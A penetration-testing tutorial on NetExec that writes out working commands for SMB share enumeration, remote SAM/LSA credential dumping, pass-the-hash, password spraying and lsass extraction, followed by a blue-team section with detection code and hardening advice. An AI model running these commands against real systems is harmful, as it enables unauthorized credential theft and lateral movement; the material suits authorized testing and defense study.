NetExec (CrackMapExec) in Practice: SMB Enumeration, SAM Dumping, and Password Spraying


Legal & Ethical Disclaimer. Everything below is for education and authorized penetration testing only. Run these tools exclusively against systems you own or have explicit, written permission to test. Unauthorized access to computer systems is a crime in virtually every jurisdiction (e.g., the U.S. Computer Fraud and Abuse Act, the UK Computer Misuse Act). You are responsible for staying inside the boundaries of your scope.

Introduction / Overview

NetExec (the nxc binary) is the community-maintained successor to CrackMapExec (CME). After the original CME project went quiet, the community forked and revitalized it under the NetExec name. It is the Swiss-army knife for network-level Active Directory and SMB assessments: a single tool that authenticates across hundreds of hosts, enumerates shares, dumps credentials, and runs a large catalogue of post-exploitation modules.

In this article you'll learn how to drive the SMB protocol handler (nxc smb), enumerate shares with --shares, dump local credentials with --sam, run a safe password spray, and load modules for deeper enumeration. We'll close with a Detection & Defense section so blue teams can spot and break these techniques.

How it works / Background

NetExec is a protocol-oriented framework. You pick a protocol — smb, winrm, ldap, mssql, rdp, ssh, ftp, wmi, nfs, or vnc — and supply targets plus credentials. Under the hood it leans on Impacket for the wire protocols.

For SMB, authentication happens over NTLM or Kerberos. NetExec spins up an SMB session, runs whatever action you requested, and prints a color-coded result line per host. A (Pwn3d!) tag means the credentials grant local-admin-equivalent access (you can write to ADMIN$), which is the prerequisite for --sam, --lsa, and command execution.

Credentials can be supplied as a cleartext password (-p), an NTLM hash for pass-the-hash (-H), or a Kerberos ticket (-k with KRB5CCNAME). The same syntax works whether you target one host or a whole /24.

Prerequisites / Lab setup

Build an isolated lab — never test on production. A minimal range:

  • One Windows Server 2019/2022 domain controller (CORP.LOCAL).
  • One or two domain-joined Windows 10/11 workstations.
  • A Kali Linux attacker box on the same segment.

Install NetExec on Kali. The recommended path is pipx to avoid dependency conflicts:

# Install via pipx (recommended)
pipx install git+https://github.com/Pennyw0rth/NetExec

# Or on recent Kali
sudo apt update && sudo apt install netexec

# Verify
nxc --version
nxc smb --help

NetExec stores results in a local database. You can inspect harvested hosts, credentials, and shares later with nxcdb.

Attack walkthrough / PoC

1. Host discovery and null sessions

Point NetExec at a subnet with no credentials to fingerprint hosts. The banner reveals hostname, domain, OS build, SMB signing status, and SMBv1 support:

# Sweep a /24 — name, domain, OS, signing, SMBv1
nxc smb 10.10.10.0/24

A line like signing:False is a flag for relay attacks; SMBv1:True hints at legacy, often-vulnerable hosts. Try an anonymous (null) or guest session to enumerate without credentials:

# Null session — list shares the anonymous user can see
nxc smb 10.10.10.50 -u '' -p '' --shares

# Guest account often allowed even when null is not
nxc smb 10.10.10.50 -u 'guest' -p '' --shares

2. Authenticated SMB enumeration with --shares

Once you have a valid domain account, --shares lists every share and your effective READ/WRITE permissions — the fastest way to find open file shares full of sensitive data:

# Enumerate shares + access rights across the subnet
nxc smb 10.10.10.0/24 -u jdoe -p 'Summer2025!' --shares

Other high-value enumeration flags using the same session:

# Logged-on users, local users, password policy, and a RID brute force
nxc smb 10.10.10.50 -u jdoe -p 'Summer2025!' --loggedon-users
nxc smb 10.10.10.50 -u jdoe -p 'Summer2025!' --users
nxc smb 10.10.10.50 -u jdoe -p 'Summer2025!' --pass-pol
nxc smb 10.10.10.50 -u jdoe -p 'Summer2025!' --rid-brute 5000

# Recursively spider a share for interesting files
nxc smb 10.10.10.50 -u jdoe -p 'Summer2025!' -M spider_plus -o DOWNLOAD_FLAG=False

3. Dumping credentials with --sam and --lsa

When NetExec reports (Pwn3d!), you have local admin. Now you can dump the local SAM database (local account NTLM hashes) over \\host\ADMIN$ via remote registry, exactly like Impacket's secretsdump:

# Dump local SAM hashes (requires admin / Pwn3d!)
nxc smb 10.10.10.50 -u administrator -p 'P@ssw0rd!' --sam

# Dump LSA secrets (cached domain creds, service account passwords, DPAPI keys)
nxc smb 10.10.10.50 -u administrator -p 'P@ssw0rd!' --lsa

Those NT hashes feed straight into pass-the-hash. NetExec accepts the hash with -H:

# Pass-the-hash across the subnet to find where this local admin hash is valid
nxc smb 10.10.10.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c'

This is classic lateral movement via shared local-admin passwords — the exact problem LAPS was built to solve.

4. Password spraying

A password spray tries one password against many accounts to avoid lockouts. Always check the lockout policy first (--pass-pol) and stay well under the lockoutThreshold. Feed NetExec a list of users and a single password:

# One password, many users — pass --continue-on-success to test every account
nxc smb 10.10.10.50 -u users.txt -p 'Spring2025!' --continue-on-success

# Spray a previously dumped hash against the domain
nxc smb dc01.corp.local -u users.txt -H '<ntlmhash>' --continue-on-success

Without --continue-on-success, NetExec stops at the first valid pair (useful when you just need one foothold). Valid results print in green and are saved to the nxcdb database for reuse.

5. Modules

Modules extend NetExec well beyond built-in flags. List and inspect them:

nxc smb -L                    # list all SMB modules
nxc smb -M lsassy --options   # show a module's options

High-impact examples:

# Pull lsass credentials in-memory (no minidump on disk)
nxc smb 10.10.10.50 -u administrator -p 'P@ssw0rd!' -M lsassy

# Enumerate Group Policy Preferences passwords (MS14-025 / cpassword)
nxc smb 10.10.10.0/24 -u jdoe -p 'Summer2025!' -M gpp_password

# Check for ZeroLogon (CVE-2020-1472) without exploiting
nxc smb dc01.corp.local -u '' -p '' -M zerologon

# Check for PrintNightmare (CVE-2021-1675 / CVE-2021-34527)
nxc smb 10.10.10.50 -u jdoe -p 'Summer2025!' -M printnightmare

For more on abusing the hashes you collect, see my notes on Pass-the-Hash and NTLM relay and Kerberoasting.

Attack flow

[Figure: attack-flow diagram]

The diagram shows the loop from unauthenticated discovery, through credential acquisition and spraying, to dumping hashes and pivoting with pass-the-hash until a privileged foothold is reached.

Detection & Defense (Blue Team)

NetExec is loud if you know where to listen. The mitigations below matter as much as the offensive workflow above.

1. Watch the authentication logs. Password spraying generates many 4625 (failed logon) events with LogonType 3 (network) from a single source IP across many usernames in a short window. A correlation rule on "N distinct target accounts from one source within M minutes" catches most sprays. Successful spray hits show as 4624 with the same network logon type.
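The correlation rule above, worked through on constructed Security-log records as an added example (not part of the original article): a sliding window over 4625/LogonType 3 failures per source IP, with 4624 network logons from the same source in or just after the window reported as probable spray hits. Field names and thresholds are assumptions; tune N and M to your environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

def ev(eid, hhmmss, ip, user, ltype=3):
    """Build a minimal Security-log record (EventID, TimeCreated, IpAddress,
    TargetUserName, LogonType). All sample data below is constructed, not real."""
    return {"id": eid, "t": f"2025-05-01T{hhmmss}", "ip": ip, "user": user, "ltype": ltype}

EVENTS = [
    # One source, many distinct accounts, network logon, tight window: a spray.
    ev(4625, "09:00:01", "10.10.10.99", "jdoe"),
    ev(4625, "09:00:02", "10.10.10.99", "asmith"),
    ev(4625, "09:00:03", "10.10.10.99", "bjones"),
    ev(4625, "09:00:04", "10.10.10.99", "clee"),
    ev(4624, "09:00:05", "10.10.10.99", "dkim"),     # the one account that worked
    # One source hammering a single account: brute force / typo, not a spray.
    ev(4625, "09:01:00", "10.10.10.21", "jdoe"),
    ev(4625, "09:01:05", "10.10.10.21", "jdoe"),
    ev(4625, "09:01:09", "10.10.10.21", "jdoe"),
    # Interactive failures (LogonType 2) are out of scope for a network-spray rule.
    ev(4625, "09:02:00", "10.10.10.30", "erose", ltype=2),
    ev(4625, "09:02:01", "10.10.10.30", "fgray", ltype=2),
    ev(4625, "09:02:02", "10.10.10.30", "hwong", ltype=2),
]

def detect_spray(events, n_accounts=3, window_minutes=5):
    """Return {source_ip: {"failed_accounts": [...], "successes": [...]}} for each
    source whose 4625/LogonType 3 failures hit >= n_accounts distinct accounts
    inside any window_minutes sliding window; 4624s from that source inside the
    window (or one window length after it) are reported as probable spray hits."""
    window = timedelta(minutes=window_minutes)
    by_ip = defaultdict(list)
    for e in events:
        if e["ltype"] == 3 and e["id"] in (4624, 4625):
            by_ip[e["ip"]].append((datetime.fromisoformat(e["t"]), e))
    alerts = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r[0])
        fails = [r for r in recs if r[1]["id"] == 4625]
        start = 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1                     # slide the window forward
            users = {r[1]["user"] for r in fails[start:end + 1]}
            if len(users) >= n_accounts:
                lo, hi = fails[start][0], fails[end][0] + window
                hits = {r[1]["user"] for r in recs if r[1]["id"] == 4624 and lo <= r[0] <= hi}
                alerts[ip] = {"failed_accounts": sorted(users), "successes": sorted(hits)}
    return alerts
```

The single-account source is deliberately not flagged: that pattern belongs to a lockout/brute-force rule, and keeping the two apart stops the spray rule from paging on every mistyped password.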

2. Detect remote SAM/LSA dumping. --sam and --lsa work through the Remote Registry service and ADMIN$. Hunt for:

  • 5145 (detailed file share access) referencing ADMIN$ plus winreg/svcctl named pipes.
  • 4624 LogonType 3 with admin accounts immediately followed by service-control activity.
  • lsassy/lsass access maps to MITRE T1003.001 (LSASS Memory); deploy Credential Guard and an EDR rule on suspicious lsass.exe handle requests.
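The first two hunts above, as an added example that is not part of the original article: per source IP, look for 5145 events that open the svcctl or winreg pipe on IPC$ and touch ADMIN$ within a short window. Record fields, pipe names and the 120-second window are assumptions; the sample events are constructed.

```python
from collections import defaultdict
from datetime import datetime

# Pipes that remote SAM/LSA dumping needs: svcctl (start Remote Registry via the
# Service Control Manager) and winreg (read the hives remotely).
DUMP_PIPES = {"svcctl", "winreg"}
def share_ev(hhmmss, ip, user, share, target):
    """Minimal 5145 record (IpAddress, SubjectUserName, ShareName,
    RelativeTargetName). All sample data below is constructed."""
    return {"id": 5145, "t": f"2025-05-01T{hhmmss}", "ip": ip, "user": user,
            "share": share, "target": target}

EVENTS = [
    # Source .99: SCM pipe, then winreg pipe, then a write into ADMIN$ -> dump pattern.
    share_ev("09:10:00", "10.10.10.99", "CORP\\administrator", "\\\\*\\IPC$", "svcctl"),
    share_ev("09:10:02", "10.10.10.99", "CORP\\administrator", "\\\\*\\IPC$", "winreg"),
    share_ev("09:10:03", "10.10.10.99", "CORP\\administrator", "\\\\*\\ADMIN$", "Temp\\constructed.tmp"),
    # Source .21: plain share enumeration (srvsvc) and a file on a data share -> benign.
    share_ev("09:11:00", "10.10.10.21", "CORP\\jdoe", "\\\\*\\IPC$", "srvsvc"),
    share_ev("09:11:01", "10.10.10.21", "CORP\\jdoe", "\\\\*\\Finance", "Q1\\budget.xlsx"),
    # Source .30: admin copies a file via ADMIN$ but never opens svcctl/winreg -> no alert.
    share_ev("09:12:00", "10.10.10.30", "CORP\\helpdesk", "\\\\*\\ADMIN$", "Temp\\agent.msi"),
]

def hunt_remote_dump(events, window_seconds=120):
    """Return {source_ip: {...}} for every source whose 5145 events show both a
    winreg/svcctl pipe open on IPC$ and ADMIN$ access within window_seconds."""
    by_ip = defaultdict(list)
    for e in events:
        if e["id"] == 5145:
            by_ip[e["ip"]].append(e)
    hits = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["t"])
        for i, anchor in enumerate(recs):          # try each event as window start
            t0 = datetime.fromisoformat(anchor["t"])
            pipes, admin_share = set(), False
            for r in recs[i:]:
                if (datetime.fromisoformat(r["t"]) - t0).total_seconds() > window_seconds:
                    break
                share = r["share"].upper()
                if share.endswith("IPC$") and r["target"].lower() in DUMP_PIPES:
                    pipes.add(r["target"].lower())
                elif share.endswith("ADMIN$"):
                    admin_share = True
            if pipes and admin_share:
                hits[ip] = {"user": anchor["user"], "first_seen": anchor["t"], "pipes": sorted(pipes)}
                break
    return hits
```

5145 is only written when the "Audit Detailed File Share" subcategory is enabled, so confirm it is on before relying on this hunt.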

3. Kill the prerequisites.

  • Enforce SMB signing (RequireSecuritySignature = 1) to neutralize NTLM relay; the signing:False banner is your audit target.
  • Disable SMBv1 entirely (Set-SmbServerConfiguration -EnableSMB1Protocol $false).
  • Deploy Windows LAPS so every machine has a unique local admin password — this breaks the pass-the-hash lateral-movement loop that NetExec exploits.
  • Restrict null/anonymous sessions: set RestrictAnonymous / RestrictAnonymousSAM = 1 and RestrictRemoteSAM (the O:BAG:BAD:(A;;RC;;;BA) SDDL) so --rid-brute and anonymous --shares fail.
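To turn the signing:False and SMBv1:True banners into an audit list, here is an added example (not code from the article or the NetExec project) that parses the output of the unauthenticated sweep from section 1 and reports every host that still fails the first two checks. The sample lines are constructed to match the banner layout shown in section 1; the regex keys off the name/domain/signing/SMBv1 tags and is an assumption that may need adjusting for other nxc versions.

```python
import re

# Constructed lines modelled on the nxc smb banner shown in section 1 (host, port,
# name, then OS and the name/domain/signing/SMBv1 tags); not captured tool output.
SAMPLE_OUTPUT = """\
SMB         10.10.10.10     445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.10.10.50     445    WS01             [*] Windows 10 Build 19041 x64 (name:WS01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         10.10.10.77     445    LEGACY01         [*] Windows Server 2008 R2 Build 7601 x64 (name:LEGACY01) (domain:corp.local) (signing:False) (SMBv1:True)
SMB         10.10.10.80     445    FS01             [+] corp.local\\jdoe:Summer2025!
"""

BANNER_RE = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+(?P<port>\d+)\s+(?P<host>\S+)\s+\[\*\].*?"
    r"\(domain:(?P<domain>[^)]*)\)\s*\(signing:(?P<signing>True|False)\)\s*"
    r"\(SMBv1:(?P<smbv1>True|False)\)"
)
ANSI_RE = re.compile(r"\x1b\[[0-9;]*m")   # strip colour codes if output was captured from a terminal

def parse_banners(text):
    """Yield one dict per banner line; login/result lines ([+]/[-]) are skipped."""
    for line in text.splitlines():
        m = BANNER_RE.match(ANSI_RE.sub("", line))
        if m:
            d = m.groupdict()
            d["signing"] = d["signing"] == "True"
            d["smbv1"] = d["smbv1"] == "True"
            yield d

def audit_smb(text):
    """Return [(ip, host, [issues])] for hosts that fail the hardening checks
    above: signing not required, or SMBv1 still enabled."""
    findings = []
    for h in parse_banners(text):
        issues = []
        if not h["signing"]:
            issues.append("SMB signing not required (NTLM relay target)")
        if h["smbv1"]:
            issues.append("SMBv1 enabled")
        if issues:
            findings.append((h["ip"], h["host"], issues))
    return findings
```

Re-run the sweep after pushing the signing and SMBv1 settings above; an empty findings list is the evidence that the change actually landed on every host.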

4. Patch the modules' targets. ZeroLogon (CVE-2020-1472) and PrintNightmare (CVE-2021-34527) are detected and exploited by NetExec modules — apply the August 2020 and July 2021 patches, and remediate MS14-025 GPP cpassword by removing legacy Groups.xml files.

5. Account hardening. Set a sensible account lockout policy (e.g., 10 attempts / 15-minute window) to blunt spraying, enable MFA on remote access, and alert on logons from non-standard subnets.

These map to MITRE ATT&CK T1110.003 (Password Spraying), T1021.002 (SMB/Admin Shares), T1003 (OS Credential Dumping), and T1135 (Network Share Discovery) — build detections per technique.

Conclusion

NetExec consolidates host discovery, share enumeration, credential dumping, password spraying, and a rich module ecosystem into one nxc command. For attackers it compresses hours of manual Impacket work into a single line; for defenders, every action it performs leaves a recognizable trail. Master the offensive workflow, then close the loop by enforcing SMB signing, deploying LAPS and Credential Guard, restricting anonymous access, and alerting on the logon patterns above. Tooling is neutral — operational discipline is what keeps you on the right side of the engagement.
